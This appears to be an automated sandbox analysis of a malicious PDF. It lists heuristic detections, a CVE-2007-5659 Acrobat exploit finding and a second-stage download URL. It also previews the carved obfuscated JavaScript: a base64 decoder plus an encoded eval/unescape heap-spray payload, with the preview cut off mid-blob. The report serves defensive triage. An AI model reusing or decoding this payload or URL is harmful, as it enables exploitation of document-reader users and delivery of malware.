MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0009_000.js', is likely responsible for downloading and executing a secondary payload. The PDF_FROMCHARCODE heuristic suggests obfuscation techniques were used within the script. Due to the obfuscation and lack of specific indicators, the exact family cannot be determined, but the pattern suggests a downloader.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://tthhllkk.info//getexe.php?spl=pdf_exp Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js |
pdf-javascript-stream | PDF /JS object 9 at offset 0xD6 | 20473 bytes |
SHA-256: c6ae19d3f4740a2bc29c306b01c7314b2dea5470a4686f5eb89cc0baa5bb465b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyXXXStr.indexOf(input.charAt(i++));
enc2 = keyXXXStr.indexOf(input.charAt(i++));
enc3 = keyXXXStr.indexOf(input.charAt(i++));
enc4 = keyXXXStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
} while (i < input.length);
return output;
}
var aasd = decode64("CiB2YXIgbkdFOVVZaUdFID0gbmV3IEFycmF5KCk7CiB2YXIgbDdwdk5XblBGOwogdmFyIGxhdmUgPSBldmFsOwogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU1NSU3MyU0YSU1MCU2MSU2ZSU1NyU0ZiU2ZCUyOCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyYyUyMCU0MiUzOCU2NyU3OSU1MyU0OSUzNSU2MiU0YiUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU0MiUzOCU2NyU3OSU1MyU0OSUzNSU2MiU0YiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyMCUyYiUzZCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyMCUzZCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU0MiUzOCU2NyU3OSU1MyU0OSUzNSU2MiU0YiUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUzYiUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2NCUzMCU0YyU2ZSU3OCU0NyU0YSU3MCU0YiUyOCU0NCU3MyU3NyU0YyUzNyU2OSUzMCU2NCU1OSUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU2OSU2NiUyOCU0NCU3MyU3NyU0YyUzNyU2OSUzMCU2NCU1OSUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0NCU0YyU2OSU0MSU3MSU2NyUzNiU3NCU0ZiUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MiU0OSU3MiU0OCUzMiU3OSU2ZCU0OSU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0NCU3MyU3NyU0YyUzNyU2OSUzMCU2NCU1OSUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU0NCU0YyU2OSU0MSU3MSU2NyUzNiU3NCU0ZiUyMCUzZCUyMCUzMCU3OCUzMyUzMCUzMyUzMCUzMyUzMCUzMyUzMCUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MiU0OSU3MiU0OCUzMiU3OSU2ZCU0OSU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0NCU3MyU3NyU0YyUzNyU2OSUzMCU2NCU1OSUyMCUzZCUzZCUyMCUzMiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MiU0OSU3MiU0OCUzMiU3OSU2ZCU0OSU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1YSU3OCU0MyU2NSU0ZSU3MyU2NiU0NiU1NyUyMCUzZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0YyU0NSU1MyU2ZSU0MiU3NCU3MCU2ZSU1MyUyMCUzZCUyMCU1MiU0OSU3MiU0OCUzMiU3OSU2ZCU0OSU2MiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiUzOCU2NyU3OSU1MyU0OSUzNSU2MiU0YiUyMCUzZCUyMCU1YSU3OCU0MyU2NSU0ZSU3MyU2NiU0NiU1NyUyMCUyZCUyMCUyOCU0YyU0NSU1MyU2ZSU0MiU3NCU3MCU2ZSU1MyUyMCUyYiUyMCUzMCU3OCUzMyUzOCUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzOSUzMCUzOSUzMCUyNSU3NSUzOSUzMCUzOSUzMCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyMCUzZCUyMCU1NSU3MyU0YSU1MCU2MSU2ZSU1NyU0ZiU2ZCUyOCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyYyUyMCU0MiUzOCU2NyU3OSU1MyU0OSUzNSU2MiU0YiUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3MCU1OCU0NSU1YSU0NSU1YSU1OCU3MyU3MCUyMCUzZCUyMCUyOCU0NCU0YyU2OSU0MS